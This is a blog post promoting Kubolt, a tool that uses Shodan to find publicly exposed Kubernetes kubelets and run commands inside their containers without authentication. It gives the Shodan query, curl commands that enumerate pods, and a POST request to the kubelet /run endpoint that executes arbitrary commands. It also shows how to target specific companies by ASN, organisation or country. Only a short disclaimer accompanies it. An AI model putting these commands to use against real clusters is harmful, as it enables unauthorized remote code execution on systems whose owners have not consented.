Categories: Kali Linux

Kubolt : Utility For Scanning Public Kubernetes Clusters

Kubolt is simple utility for scanning public unauthinticated kubernetes clusters and run commands inside containers. Sometimes, the kubelet port 10250 is open to unauthorized access and makes it possible to run commands inside the containers using getrun function from kubelet:

// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
params := getExecRequestParams(request)
pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
if !ok {
response.WriteError(http.StatusNotFound, fmt.Errorf(“pod does not exist”))
return
}

Also Read – WAFw00f : Identify & Fingerprint Web Application Firewall (WAF) Products Protecting A Website

Okay, let’s ask our friend Shodan

The basic query is

ssl:true port:10250 404

Kubelet uses port 10250 with SSL by default, 404 is the HTTP response without URL path.

Kubolt asks Shodan by API for list of IP addresses and keeps them for other OSINT actions

Firstly, let’s ask Kubelet for running pods and filter hosts where response doesn’t contain Unauthorized and contains container so we can run command inside it.

curl -k https://IP-from-Shodan:10250/runningpods/

Anyway, if you find the host without any running pods at the time, keep it for next time when pods might be started

You can list all available pods from these requests:

curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/

Next kubolt parse response and generate a new request as below:

curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d “cmd=<command-to-run>”

You can target companies more accurate using Shodan filters such as:

  • asn
  • org
  • country
  • net

Install

mkdir output
pip install -r requirements.txt

Run

python kubolt.py –query “asn:123123 org:’ACME Corporation'”
#or
python kubolt.py –query “org:’ACME Corporation’ country:UK”

Shodan

Kubolt uses Shodan API and Query Credits accordingly, if you run the tool without query filters then you will probably fire all your credits.

Disclaimer

The Tool provided by the author should only be used for educational purposes. The author can not be held responsible for the misuse of the Tool. The author is not responsible for any direct or indirect damage caused due to the usage of the Tool.

Download
R K

Share
Published by
R K
Tags: KubernetesKubernetes ClustersKubolt
6 years ago

Recent Posts

Playwright-MCP : A Powerful Tool For Browser Automation

Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…

2 weeks ago

JBDev : A Tool For Jailbreak And TrollStore Development

JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…

2 weeks ago

Kereva LLM Code Scanner : A Revolutionary Tool For Python Applications Using LLMs

The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…

2 weeks ago

Nuclei-Templates-Labs : A Hands-On Security Testing Playground

Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…

2 weeks ago

SSH-Stealer : The Stealthy Threat Of Advanced Credential Theft

SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…

2 weeks ago

ollvm-unflattener : A Tool For Reversing Control Flow Flattening In OLLVM

Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…

2 weeks ago